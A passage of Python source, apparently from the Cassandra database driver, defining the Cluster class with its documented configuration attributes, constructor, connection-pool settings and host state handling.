return DCAwareRoundRobinPolicy()
class Cluster(object):
"""
The main class to use when interacting with a Cassandra cluster.
Typically, one instance of this class will be created for each
separate Cassandra cluster that your application interacts with.
Example usage::
>>> from cassandra.cluster import Cluster
>>> cluster = Cluster(['192.168.1.1', '192.168.1.2'])
>>> session = cluster.connect()
>>> session.execute("CREATE KEYSPACE ...")
>>> ...
>>> cluster.shutdown()
``Cluster`` and ``Session`` also provide context management functions
which implicitly handle shutdown when leaving scope.
"""
contact_points = ['127.0.0.1']
"""
The list of contact points to try connecting for cluster discovery.
Defaults to loopback interface.
Note: When using :class:`.DCAwareRoundRobinPolicy` with no explicit
local_dc set (as is the default), the DC is chosen from an arbitrary
host in contact_points. In this case, contact_points should contain
only nodes from a single, local DC.
"""
port = 9042
"""
The server-side port to open connections to. Defaults to 9042.
"""
cql_version = None
"""
If a specific version of CQL should be used, this may be set to that
string version. Otherwise, the highest CQL version supported by the
server will be automatically used.
"""
protocol_version = 4
"""
The maximum version of the native protocol to use.
The driver will automatically downgrade version based on a negotiation with
the server, but it is most efficient to set this to the maximum supported
by your version of Cassandra. Setting this will also prevent conflicting
versions negotiated if your cluster is upgraded.
Version 2 of the native protocol adds support for lightweight transactions,
batch operations, and automatic query paging. The v2 protocol is
supported by Cassandra 2.0+.
Version 3 of the native protocol adds support for protocol-level
client-side timestamps (see :attr:`.Session.use_client_timestamp`),
serial consistency levels for :class:`~.BatchStatement`, and an
improved connection pool.
Version 4 of the native protocol adds a number of new types, server warnings,
new failure messages, and custom payloads. Details in the
`project docs <https://github.com/apache/cassandra/blob/trunk/doc/native_protocol_v4.spec>`_
The following table describes the native protocol versions that
are supported by each version of Cassandra:
+-------------------+-------------------+
| Cassandra Version | Protocol Versions |
+===================+===================+
| 1.2 | 1 |
+-------------------+-------------------+
| 2.0 | 1, 2 |
+-------------------+-------------------+
| 2.1 | 1, 2, 3 |
+-------------------+-------------------+
| 2.2 | 1, 2, 3, 4 |
+-------------------+-------------------+
"""
compression = True
"""
Controls compression for communications between the driver and Cassandra.
If left as the default of :const:`True`, either lz4 or snappy compression
may be used, depending on what is supported by both the driver
and Cassandra. If both are fully supported, lz4 will be preferred.
You may also set this to 'snappy' or 'lz4' to request that specific
compression type.
Setting this to :const:`False` disables compression.
"""
_auth_provider = None
_auth_provider_callable = None
@property
def auth_provider(self):
"""
When :attr:`~.Cluster.protocol_version` is 2 or higher, this should
be an instance of a subclass of :class:`~cassandra.auth.AuthProvider`,
such as :class:`~.PlainTextAuthProvider`.
When :attr:`~.Cluster.protocol_version` is 1, this should be
a function that accepts one argument, the IP address of a node,
and returns a dict of credentials for that node.
When not using authentication, this should be left as :const:`None`.
"""
return self._auth_provider
@auth_provider.setter # noqa
def auth_provider(self, value):
if not value:
self._auth_provider = value
return
try:
self._auth_provider_callable = value.new_authenticator
except AttributeError:
if self.protocol_version > 1:
raise TypeError("auth_provider must implement the cassandra.auth.AuthProvider "
"interface when protocol_version >= 2")
elif not callable(value):
raise TypeError("auth_provider must be callable when protocol_version == 1")
self._auth_provider_callable = value
self._auth_provider = value
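# Sketch of configuring authentication as described in the property docstring
# (credentials are placeholders):
#
#   from cassandra.auth import PlainTextAuthProvider
#   auth = PlainTextAuthProvider(username='cassandra', password='cassandra')
#   cluster = Cluster(auth_provider=auth, protocol_version=4)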
load_balancing_policy = None
"""
An instance of :class:`.policies.LoadBalancingPolicy` or
one of its subclasses.
.. versionchanged:: 2.6.0
Defaults to :class:`~.TokenAwarePolicy` (:class:`~.DCAwareRoundRobinPolicy`)
when using CPython (where the murmur3 extension is available); :class:`~.DCAwareRoundRobinPolicy`
otherwise. Default local DC will be chosen from contact points.
**Please see** :class:`~.DCAwareRoundRobinPolicy` **for a discussion on default behavior with respect to
DC locality and remote nodes.**
"""
reconnection_policy = ExponentialReconnectionPolicy(1.0, 600.0)
"""
An instance of :class:`.policies.ReconnectionPolicy`. Defaults to an instance
of :class:`.ExponentialReconnectionPolicy` with a base delay of one second and
a max delay of ten minutes.
"""
default_retry_policy = RetryPolicy()
"""
A default :class:`.policies.RetryPolicy` instance to use for all
:class:`.Statement` objects which do not have a :attr:`~.Statement.retry_policy`
explicitly set.
"""
conviction_policy_factory = SimpleConvictionPolicy
"""
A factory function which creates instances of
:class:`.policies.ConvictionPolicy`. Defaults to
:class:`.policies.SimpleConvictionPolicy`.
"""
address_translator = IdentityTranslator()
"""
:class:`.policies.AddressTranslator` instance to be used in translating server node addresses
to driver connection addresses.
"""
connect_to_remote_hosts = True
"""
If left as :const:`True`, hosts that are considered :attr:`~.HostDistance.REMOTE`
by the :attr:`~.Cluster.load_balancing_policy` will have a connection
opened to them. Otherwise, they will not have a connection opened to them.
Note that the default load balancing policy ignores remote hosts by default.
.. versionadded:: 2.1.0
"""
metrics_enabled = False
"""
Whether or not metric collection is enabled. If enabled, :attr:`.metrics`
will be an instance of :class:`~cassandra.metrics.Metrics`.
"""
metrics = None
"""
An instance of :class:`cassandra.metrics.Metrics` if :attr:`.metrics_enabled` is
:const:`True`, else :const:`None`.
"""
ssl_options = None
"""
An optional dict which will be used as kwargs for ``ssl.wrap_socket()``
when new sockets are created. This should be used when client encryption
is enabled in Cassandra.
By default, a ``ca_certs`` value should be supplied (the value should be
a string pointing to the location of the CA certs file), and you probably
want to specify ``ssl_version`` as ``ssl.PROTOCOL_TLSv1`` to match
Cassandra's default protocol.
.. versionchanged:: 3.3.0
In addition to ``wrap_socket`` kwargs, clients may also specify ``'check_hostname': True`` to verify the cert hostname
as outlined in RFC 2818 and RFC 6125. Note that this requires the certificate to be transferred, so
should almost always require the option ``'cert_reqs': ssl.CERT_REQUIRED``. Note also that this functionality was not built into
Python standard library until (2.7.9, 3.2). To enable this mechanism in earlier versions, patch ``ssl.match_hostname``
with a custom or `back-ported function <https://pypi.python.org/pypi/backports.ssl_match_hostname>`_.
"""
sockopts = None
"""
An optional list of tuples which will be used as arguments to
``socket.setsockopt()`` for all created sockets.
Note: some drivers find setting TCP_NODELAY beneficial in the context of
their execution model. It was not found generally beneficial for this driver.
To try with your own workload, set ``sockopts = [(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)]``
"""
max_schema_agreement_wait = 10
"""
The maximum duration (in seconds) that the driver will wait for schema
agreement across the cluster. Defaults to ten seconds.
If set <= 0, the driver will bypass schema agreement waits altogether.
"""
metadata = None
"""
An instance of :class:`cassandra.metadata.Metadata`.
"""
connection_class = DefaultConnection
"""
This determines what event loop system will be used for managing
I/O with Cassandra. These are the current options:
* :class:`cassandra.io.asyncorereactor.AsyncoreConnection`
* :class:`cassandra.io.libevreactor.LibevConnection`
* :class:`cassandra.io.eventletreactor.EventletConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.geventreactor.GeventConnection` (requires monkey-patching - see doc for details)
* :class:`cassandra.io.twistedreactor.TwistedConnection`
By default, ``AsyncoreConnection`` will be used, which uses
the ``asyncore`` module in the Python standard library.
If ``libev`` is installed, ``LibevConnection`` will be used instead.
If ``gevent`` or ``eventlet`` monkey-patching is detected, the corresponding
connection class will be used automatically.
"""
control_connection_timeout = 2.0
"""
A timeout, in seconds, for queries made by the control connection, such
as querying the current schema and information about nodes in the cluster.
If set to :const:`None`, there will be no timeout for these queries.
"""
idle_heartbeat_interval = 30
"""
Interval, in seconds, on which to heartbeat idle connections. This helps
keep connections open through network devices that expire idle connections.
It also helps discover bad connections early in low-traffic scenarios.
Setting to zero disables heartbeats.
"""
schema_event_refresh_window = 2
"""
Window, in seconds, within which a schema component will be refreshed after
receiving a schema_change event.
The driver delays a random amount of time in the range [0.0, window)
before executing the refresh. This serves two purposes:
1.) Spread the refresh for deployments with large fanout from C* to client tier,
preventing a 'thundering herd' problem with many clients refreshing simultaneously.
2.) Remove redundant refreshes. Redundant events arriving within the delay period
are discarded, and only one refresh is executed.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable schema refreshes in response to push events
(refreshes will still occur in response to schema change responses to DDL statements
executed by Sessions of this Cluster).
"""
topology_event_refresh_window = 10
"""
Window, in seconds, within which the node and token list will be refreshed after
receiving a topology_change event.
Setting this to zero will execute refreshes immediately.
Setting this negative will disable node refreshes in response to push events.
See :attr:`.schema_event_refresh_window` for discussion of rationale.
"""
status_event_refresh_window = 2
"""
Window, in seconds, within which the driver will start the reconnect after
receiving a status_change event.
Setting this to zero will connect immediately.
This is primarily used to avoid 'thundering herd' in deployments with large fanout from cluster to clients.
When nodes come up, clients attempt to reprepare prepared statements (depending on :attr:`.reprepare_on_up`), and
establish connection pools. This can cause a rush of connections and queries if not mitigated with this factor.
"""
prepare_on_all_hosts = True
"""
Specifies whether statements should be prepared on all hosts, or just one.
This can reasonably be disabled on long-running applications with numerous clients preparing statements on startup,
where a randomized initial condition of the load balancing policy can be expected to distribute prepares from
different clients across the cluster.
"""
reprepare_on_up = True
"""
Specifies whether all known prepared statements should be prepared on a node when it comes up.
May be used to avoid overwhelming a node on return, or if it is supposed that the node was only marked down due to
network. If statements are not reprepared, they are prepared on the first execution, causing
an extra roundtrip for one or more client requests.
"""
connect_timeout = 5
"""
Timeout, in seconds, for creating new connections.
This timeout covers the entire connection negotiation, including TCP
establishment, options passing, and authentication.
"""
@property
def schema_metadata_enabled(self):
"""
Flag indicating whether internal schema metadata is updated.
When disabled, the driver does not populate Cluster.metadata.keyspaces on connect, or on schema change events. This
can be used to speed initial connection, and reduce load on client and server during operation. Turning this off
gives away token aware request routing, and programmatic inspection of the metadata model.
"""
return self.control_connection._schema_meta_enabled
@schema_metadata_enabled.setter
def schema_metadata_enabled(self, enabled):
self.control_connection._schema_meta_enabled = bool(enabled)
@property
def token_metadata_enabled(self):
"""
Flag indicating whether internal token metadata is updated.
When disabled, the driver does not query node token information on connect, or on topology change events. This
can be used to speed initial connection, and reduce load on client and server during operation. It is most useful
in large clusters using vnodes, where the token map can be expensive to compute. Turning this off
gives away token aware request routing, and programmatic inspection of the token ring.
"""
return self.control_connection._token_meta_enabled
@token_metadata_enabled.setter
def token_metadata_enabled(self, enabled):
self.control_connection._token_meta_enabled = bool(enabled)
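# Sketch of trading metadata for faster startup, as described above (disabling
# both also gives up token-aware routing and schema introspection):
#
#   cluster = Cluster(schema_metadata_enabled=False, token_metadata_enabled=False)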
sessions = None
control_connection = None
scheduler = None
executor = None
is_shutdown = False
_is_setup = False
_prepared_statements = None
_prepared_statement_lock = None
_idle_heartbeat = None
_user_types = None
"""
A map of {keyspace: {type_name: UserType}}
"""
_listeners = None
_listener_lock = None
def __init__(self,
contact_points=["127.0.0.1"],
port=9042,
compression=True,
auth_provider=None,
load_balancing_policy=None,
reconnection_policy=None,
default_retry_policy=None,
conviction_policy_factory=None,
metrics_enabled=False,
connection_class=None,
ssl_options=None,
sockopts=None,
cql_version=None,
protocol_version=4,
executor_threads=2,
max_schema_agreement_wait=10,
control_connection_timeout=2.0,
idle_heartbeat_interval=30,
schema_event_refresh_window=2,
topology_event_refresh_window=10,
connect_timeout=5,
schema_metadata_enabled=True,
token_metadata_enabled=True,
address_translator=None,
status_event_refresh_window=2,
prepare_on_all_hosts=True,
reprepare_on_up=True):
"""
``executor_threads`` defines the number of threads in a pool for handling asynchronous tasks such as
establishing connection pools or refreshing metadata.
Any of the mutable Cluster attributes may be set as keyword arguments to the constructor.
"""
if contact_points is not None:
if isinstance(contact_points, six.string_types):
raise TypeError("contact_points should not be a string, it should be a sequence (e.g. list) of strings")
if None in contact_points:
raise ValueError("contact_points should not contain None (it can resolve to localhost)")
self.contact_points = contact_points
self.port = port
self.contact_points_resolved = [endpoint[4][0] for a in self.contact_points
for endpoint in socket.getaddrinfo(a, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)]
self.compression = compression
self.protocol_version = protocol_version
self.auth_provider = auth_provider
if load_balancing_policy is not None:
if isinstance(load_balancing_policy, type):
raise TypeError("load_balancing_policy should not be a class, it should be an instance of that class")
self.load_balancing_policy = load_balancing_policy
else:
self.load_balancing_policy = default_lbp_factory()
if reconnection_policy is not None:
if isinstance(reconnection_policy, type):
raise TypeError("reconnection_policy should not be a class, it should be an instance of that class")
self.reconnection_policy = reconnection_policy
if default_retry_policy is not None:
if isinstance(default_retry_policy, type):
raise TypeError("default_retry_policy should not be a class, it should be an instance of that class")
self.default_retry_policy = default_retry_policy
if conviction_policy_factory is not None:
if not callable(conviction_policy_factory):
raise ValueError("conviction_policy_factory must be callable")
self.conviction_policy_factory = conviction_policy_factory
if address_translator is not None:
if isinstance(address_translator, type):
raise TypeError("address_translator should not be a class, it should be an instance of that class")
self.address_translator = address_translator
if connection_class is not None:
self.connection_class = connection_class
self.metrics_enabled = metrics_enabled
self.ssl_options = ssl_options
self.sockopts = sockopts
self.cql_version = cql_version
self.max_schema_agreement_wait = max_schema_agreement_wait
self.control_connection_timeout = control_connection_timeout
self.idle_heartbeat_interval = idle_heartbeat_interval
self.schema_event_refresh_window = schema_event_refresh_window
self.topology_event_refresh_window = topology_event_refresh_window
self.status_event_refresh_window = status_event_refresh_window
self.connect_timeout = connect_timeout
self.prepare_on_all_hosts = prepare_on_all_hosts
self.reprepare_on_up = reprepare_on_up
self._listeners = set()
self._listener_lock = Lock()
# let Session objects be GC'ed (and shutdown) when the user no longer
# holds a reference.
self.sessions = WeakSet()
self.metadata = Metadata()
self.control_connection = None
self._prepared_statements = WeakValueDictionary()
self._prepared_statement_lock = Lock()
self._user_types = defaultdict(dict)
self._min_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MIN_REQUESTS,
HostDistance.REMOTE: DEFAULT_MIN_REQUESTS
}
self._max_requests_per_connection = {
HostDistance.LOCAL: DEFAULT_MAX_REQUESTS,
HostDistance.REMOTE: DEFAULT_MAX_REQUESTS
}
self._core_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MIN_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MIN_CONNECTIONS_PER_REMOTE_HOST
}
self._max_connections_per_host = {
HostDistance.LOCAL: DEFAULT_MAX_CONNECTIONS_PER_LOCAL_HOST,
HostDistance.REMOTE: DEFAULT_MAX_CONNECTIONS_PER_REMOTE_HOST
}
self.executor = ThreadPoolExecutor(max_workers=executor_threads)
self.scheduler = _Scheduler(self.executor)
self._lock = RLock()
if self.metrics_enabled:
from cassandra.metrics import Metrics
self.metrics = Metrics(weakref.proxy(self))
self.control_connection = ControlConnection(
self, self.control_connection_timeout,
self.schema_event_refresh_window, self.topology_event_refresh_window,
self.status_event_refresh_window,
schema_metadata_enabled, token_metadata_enabled)
def register_user_type(self, keyspace, user_type, klass):
"""
Registers a class to use to represent a particular user-defined type.
Query parameters for this user-defined type will be assumed to be
instances of `klass`. Result sets for this user-defined type will
be instances of `klass`. If no class is registered for a user-defined
type, a namedtuple will be used for result sets, and non-prepared
statements may not encode parameters for this type correctly.
`keyspace` is the name of the keyspace that the UDT is defined in.
`user_type` is the string name of the UDT to register the mapping
for.
`klass` should be a class with attributes whose names match the
fields of the user-defined type. The constructor must accept kwargs
for each of the fields in the UDT.
This method should only be called after the type has been created
within Cassandra.
Example::
cluster = Cluster(protocol_version=3)
session = cluster.connect()
session.set_keyspace('mykeyspace')
session.execute("CREATE TYPE address (street text, zipcode int)")
session.execute("CREATE TABLE users (id int PRIMARY KEY, location address)")
# create a class to map to the "address" UDT
class Address(object):
def __init__(self, street, zipcode):
self.street = street
self.zipcode = zipcode
cluster.register_user_type('mykeyspace', 'address', Address)
# insert a row using an instance of Address
session.execute("INSERT INTO users (id, location) VALUES (%s, %s)",
(0, Address("123 Main St.", 78723)))
# results will include Address instances
results = session.execute("SELECT * FROM users")
row = results[0]
print row.id, row.location.street, row.location.zipcode
"""
if self.protocol_version < 3:
log.warning("User Type serialization is only supported in native protocol version 3+ (%d in use). "
"CQL encoding for simple statements will still work, but named tuples will "
"be returned when reading type %s.%s.", self.protocol_version, keyspace, user_type)
self._user_types[keyspace][user_type] = klass
for session in self.sessions:
session.user_type_registered(keyspace, user_type, klass)
UserType.evict_udt_class(keyspace, user_type)
def get_min_requests_per_connection(self, host_distance):
return self._min_requests_per_connection[host_distance]
def set_min_requests_per_connection(self, host_distance, min_requests):
"""
Sets a threshold for concurrent requests per connection, below which
connections will be considered for disposal (down to core connections;
see :meth:`~Cluster.set_core_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_min_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if min_requests < 0 or min_requests > 126 or \
min_requests >= self._max_requests_per_connection[host_distance]:
raise ValueError("min_requests must be 0-126 and less than the max_requests for this host_distance (%d)" %
(self._min_requests_per_connection[host_distance],))
self._min_requests_per_connection[host_distance] = min_requests
def get_max_requests_per_connection(self, host_distance):
return self._max_requests_per_connection[host_distance]
def set_max_requests_per_connection(self, host_distance, max_requests):
"""
Sets a threshold for concurrent requests per connection, above which new
connections will be created to a host (up to max connections;
see :meth:`~Cluster.set_max_connections_per_host`).
Pertains to connection pool management in protocol versions {1,2}.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_requests_per_connection() only has an effect "
"when using protocol_version 1 or 2.")
if max_requests < 1 or max_requests > 127 or \
max_requests <= self._min_requests_per_connection[host_distance]:
raise ValueError("max_requests must be 1-127 and greater than the min_requests for this host_distance (%d)" %
(self._min_requests_per_connection[host_distance],))
self._max_requests_per_connection[host_distance] = max_requests
def get_core_connections_per_host(self, host_distance):
"""
Gets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._core_connections_per_host[host_distance]
def set_core_connections_per_host(self, host_distance, core_connections):
"""
Sets the minimum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 2 for :attr:`~HostDistance.LOCAL` and 1 for
:attr:`~HostDistance.REMOTE`.
Protocol version 1 and 2 are limited in the number of concurrent
requests they can send per connection. The driver implements connection
pooling to support higher levels of concurrency.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupportedOperation`.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_core_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
old = self._core_connections_per_host[host_distance]
self._core_connections_per_host[host_distance] = core_connections
if old < core_connections:
self._ensure_core_connections()
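# Pool-sizing sketch for protocol v1/v2 clusters, per the methods above and
# below (values are illustrative only):
#
#   cluster = Cluster(protocol_version=2)
#   cluster.set_core_connections_per_host(HostDistance.LOCAL, 4)
#   cluster.set_max_connections_per_host(HostDistance.LOCAL, 16)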
def get_max_connections_per_host(self, host_distance):
"""
Gets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 8 for :attr:`~HostDistance.LOCAL` and 2 for
:attr:`~HostDistance.REMOTE`.
This property is ignored if :attr:`~.Cluster.protocol_version` is
3 or higher.
"""
return self._max_connections_per_host[host_distance]
def set_max_connections_per_host(self, host_distance, max_connections):
"""
Sets the maximum number of connections per Session that will be opened
for each host with :class:`~.HostDistance` equal to `host_distance`.
The default is 8 for :attr:`~HostDistance.LOCAL` and 2 for
:attr:`~HostDistance.REMOTE`.
If :attr:`~.Cluster.protocol_version` is set to 3 or higher, this
is not supported (there is always one connection per host, unless
the host is remote and :attr:`connect_to_remote_hosts` is :const:`False`)
and using this will result in an :exc:`~.UnsupportedOperation`.
"""
if self.protocol_version >= 3:
raise UnsupportedOperation(
"Cluster.set_max_connections_per_host() only has an effect "
"when using protocol_version 1 or 2.")
self._max_connections_per_host[host_distance] = max_connections
def connection_factory(self, address, *args, **kwargs):
"""
Called to create a new connection with proper configuration.
Intended for internal use only.
"""
kwargs = self._make_connection_kwargs(address, kwargs)
return self.connection_class.factory(address, self.connect_timeout, *args, **kwargs)
def _make_connection_factory(self, host, *args, **kwargs):
kwargs = self._make_connection_kwargs(host.address, kwargs)
return partial(self.connection_class.factory, host.address, self.connect_timeout, *args, **kwargs)
def _make_connection_kwargs(self, address, kwargs_dict):
if self._auth_provider_callable:
kwargs_dict.setdefault('authenticator', self._auth_provider_callable(address))
kwargs_dict.setdefault('port', self.port)
kwargs_dict.setdefault('compression', self.compression)
kwargs_dict.setdefault('sockopts', self.sockopts)
kwargs_dict.setdefault('ssl_options', self.ssl_options)
kwargs_dict.setdefault('cql_version', self.cql_version)
kwargs_dict.setdefault('protocol_version', self.protocol_version)
kwargs_dict.setdefault('user_type_map', self._user_types)
return kwargs_dict
def protocol_downgrade(self, host_addr, previous_version):
new_version = previous_version - 1
if new_version < self.protocol_version:
if new_version >= MIN_SUPPORTED_VERSION:
log.warning("Downgrading core protocol version from %d to %d for %s. "
"To avoid this, it is best practice to explicitly set Cluster(protocol_version) to the version supported by your cluster. "
"http://datastax.github.io/python-driver/api/cassandra/cluster.html#cassandra.cluster.Cluster.protocol_version", self.protocol_version, new_version, host_addr)
self.protocol_version = new_version
else:
raise DriverException("Cannot downgrade protocol version (%d) below minimum supported version: %d" % (new_version, MIN_SUPPORTED_VERSION))
def connect(self, keyspace=None):
"""
Creates and returns a new :class:`~.Session` object. If `keyspace`
is specified, that keyspace will be the default keyspace for
operations on the ``Session``.
"""
with self._lock:
if self.is_shutdown:
raise DriverException("Cluster is already shut down")
if not self._is_setup:
log.debug("Connecting to cluster, contact points: %s; protocol version: %s",
self.contact_points, self.protocol_version)
self.connection_class.initialize_reactor()
_register_cluster_shutdown(self)
for address in self.contact_points_resolved:
host, new = self.add_host(address, signal=False)
if new:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
self.load_balancing_policy.populate(
weakref.proxy(self), self.metadata.all_hosts())
try:
self.control_connection.connect()
log.debug("Control connection created")
except Exception:
log.exception("Control connection failed to connect, "
"shutting down Cluster:")
self.shutdown()
raise
self.load_balancing_policy.check_supported()
if self.idle_heartbeat_interval:
self._idle_heartbeat = ConnectionHeartbeat(self.idle_heartbeat_interval, self.get_connection_holders)
self._is_setup = True
session = self._new_session()
if keyspace:
session.set_keyspace(keyspace)
return session
def get_connection_holders(self):
holders = []
for s in self.sessions:
holders.extend(s.get_pools())
holders.append(self.control_connection)
return holders
def shutdown(self):
"""
Closes all sessions and connection associated with this Cluster.
To ensure all connections are properly closed, **you should always
call shutdown() on a Cluster instance when you are done with it**.
Once shutdown, a Cluster should not be used for any purpose.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
if self._idle_heartbeat:
self._idle_heartbeat.stop()
self.scheduler.shutdown()
self.control_connection.shutdown()
for session in self.sessions:
session.shutdown()
self.executor.shutdown()
_discard_cluster_shutdown(self)
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
def _new_session(self):
session = Session(self, self.metadata.all_hosts())
self._session_register_user_types(session)
self.sessions.add(session)
return session
def _session_register_user_types(self, session):
for keyspace, type_map in six.iteritems(self._user_types):
for udt_name, klass in six.iteritems(type_map):
session.user_type_registered(keyspace, udt_name, klass)
def _cleanup_failed_on_up_handling(self, host):
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.remove_pool(host)
self._start_reconnector(host, is_host_addition=False)
def _on_up_future_completed(self, host, futures, results, lock, finished_future):
with lock:
futures.discard(finished_future)
try:
results.append(finished_future.result())
except Exception as exc:
results.append(exc)
if futures:
return
try:
# all futures have completed at this point
for exc in [f for f in results if isinstance(f, Exception)]:
log.error("Unexpected failure while marking node %s up:", host, exc_info=exc)
self._cleanup_failed_on_up_handling(host)
return
if not all(results):
log.debug("Connection pool could not be created, not marking node %s up", host)
self._cleanup_failed_on_up_handling(host)
return
log.info("Connection pools established for node %s", host)
# mark the host as up and notify all listeners
host.set_up()
for listener in self.listeners:
listener.on_up(host)
finally:
with host.lock:
host._currently_handling_node_up = False
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_up(self, host):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
log.debug("Waiting to acquire lock for handling up status of node %s", host)
with host.lock:
if host._currently_handling_node_up:
log.debug("Another thread is already handling up status of node %s", host)
return
if host.is_up:
log.debug("Host %s was already marked up", host)
return
host._currently_handling_node_up = True
log.debug("Starting to handle up status of node %s", host)
have_future = False
futures = set()
try:
log.info("Host %s may be up; will prepare queries and open connection pool", host)
reconnector = host.get_and_set_reconnection_handler(None)
if reconnector:
log.debug("Now that host %s is up, cancelling the reconnection handler", host)
reconnector.cancel()
self._prepare_all_queries(host)
log.debug("Done preparing all queries for host %s, ", host)
for session in self.sessions:
session.remove_pool(host)
log.debug("Signalling to load balancing policy that host %s is up", host)
self.load_balancing_policy.on_up(host)
log.debug("Signalling to control connection that host %s is up", host)
self.control_connection.on_up(host)
log.debug("Attempting to open new connection pools for host %s", host)
futures_lock = Lock()
futures_results = []
callback = partial(self._on_up_future_completed, host, futures, futures_results, futures_lock)
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
have_future = True
future.add_done_callback(callback)
futures.add(future)
except Exception:
log.exception("Unexpected failure handling node %s being marked up:", host)
for future in futures:
future.cancel()
self._cleanup_failed_on_up_handling(host)
with host.lock:
host._currently_handling_node_up = False
raise
else:
if not have_future:
with host.lock:
host._currently_handling_node_up = False
# for testing purposes
return futures
def _start_reconnector(self, host, is_host_addition):
if self.load_balancing_policy.distance(host) == HostDistance.IGNORED:
return
schedule = self.reconnection_policy.new_schedule()
# in order to not hold references to this Cluster open and prevent
# proper shutdown when the program ends, we'll just make a closure
# of the current Cluster attributes to create new Connections with
conn_factory = self._make_connection_factory(host)
reconnector = _HostReconnectionHandler(
host, conn_factory, is_host_addition, self.on_add, self.on_up,
self.scheduler, schedule, host.get_and_set_reconnection_handler,
new_handler=None)
old_reconnector = host.get_and_set_reconnection_handler(reconnector)
if old_reconnector:
log.debug("Old host reconnector found for %s, cancelling", host)
old_reconnector.cancel()
log.debug("Starting reconnector for host %s", host)
reconnector.start()
@run_in_executor
def on_down(self, host, is_host_addition, expect_host_to_be_down=False):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
with host.lock:
if (not host.is_up and not expect_host_to_be_down) or host.is_currently_reconnecting():
return
host.set_down()
log.warning("Host %s has been marked down", host)
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.on_down(host)
for listener in self.listeners:
listener.on_down(host)
self._start_reconnector(host, is_host_addition)
def on_add(self, host, refresh_nodes=True):
if self.is_shutdown:
return
log.debug("Handling new host %r and notifying listeners", host)
distance = self.load_balancing_policy.distance(host)
if distance != HostDistance.IGNORED:
self._prepare_all_queries(host)
log.debug("Done preparing queries for new host %r", host)
self.load_balancing_policy.on_add(host)
self.control_connection.on_add(host, refresh_nodes)
if distance == HostDistance.IGNORED:
log.debug("Not adding connection pool for new host %r because the "
"load balancing policy has marked it as IGNORED", host)
self._finalize_add(host, set_up=False)
return
futures_lock = Lock()
futures_results = []
futures = set()
def future_completed(future):
with futures_lock:
futures.discard(future)
try:
futures_results.append(future.result())
except Exception as exc:
futures_results.append(exc)
if futures:
return
log.debug('All futures have completed for added host %s', host)
for exc in [f for f in futures_results if isinstance(f, Exception)]:
log.error("Unexpected failure while adding node %s, will not mark up:", host, exc_info=exc)
return
if not all(futures_results):
log.warning("Connection pool could not be created, not marking node %s up", host)
return
self._finalize_add(host)
have_future = False
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=True)
if future is not None:
have_future = True
futures.add(future)
future.add_done_callback(future_completed)
if not have_future:
self._finalize_add(host)
def _finalize_add(self, host, set_up=True):
if set_up:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_remove(self, host):
if self.is_shutdown:
return
log.debug("Removing host %s", host)
host.set_down()
self.load_balancing_policy.on_remove(host)
for session in self.sessions:
session.on_remove(host)
for listener in self.listeners:
listener.on_remove(host)
self.control_connection.on_remove(host)
def signal_connection_failure(self, host, connection_exc, is_host_addition, expect_host_to_be_down=False):
is_down = host.signal_connection_failure(connection_exc)
if is_down:
self.on_down(host, is_host_addition, expect_host_to_be_down)
return is_down
def add_host(self, address, datacenter=None, rack=None, signal=True, refresh_nodes=True):
"""
Called when adding initial contact points and when the control
connection subsequently discovers a new node.
Returns a Host instance, and a flag indicating whether it was new in
the metadata.
Intended for internal use only.
"""
host, new = self.metadata.add_or_return_host(Host(address, self.conviction_policy_factory, datacenter, rack))
if new and signal:
log.info("New Cassandra host %r discovered", host)
self.on_add(host, refresh_nodes)
return host, new
def remove_host(self, host):
"""
Called when the control connection observes that a node has left the
ring. Intended for internal use only.
"""
if host and self.metadata.remove_host(host):
log.info("Cassandra host %s removed", host)
self.on_remove(host)
def register_listener(self, listener):
"""
Adds a :class:`cassandra.policies.HostStateListener` subclass instance to
the list of listeners to be notified when a host is added, removed,
marked up, or marked down.
"""
with self._listener_lock:
self._listeners.add(listener)
def unregister_listener(self, listener):
""" Removes a registered listener. """
with self._listener_lock:
self._listeners.remove(listener)
@property
def listeners(self):
with self._listener_lock:
return self._listeners.copy()
def _ensure_core_connections(self):
"""
If any host has fewer than the configured number of core connections
open, attempt to open connections until that number is met.
"""
for session in self.sessions:
for pool in session._pools.values():
pool.ensure_core_connections()
@staticmethod
def _validate_refresh_schema(keyspace, table, usertype, function, aggregate):
if any((table, usertype, function, aggregate)):
if not keyspace:
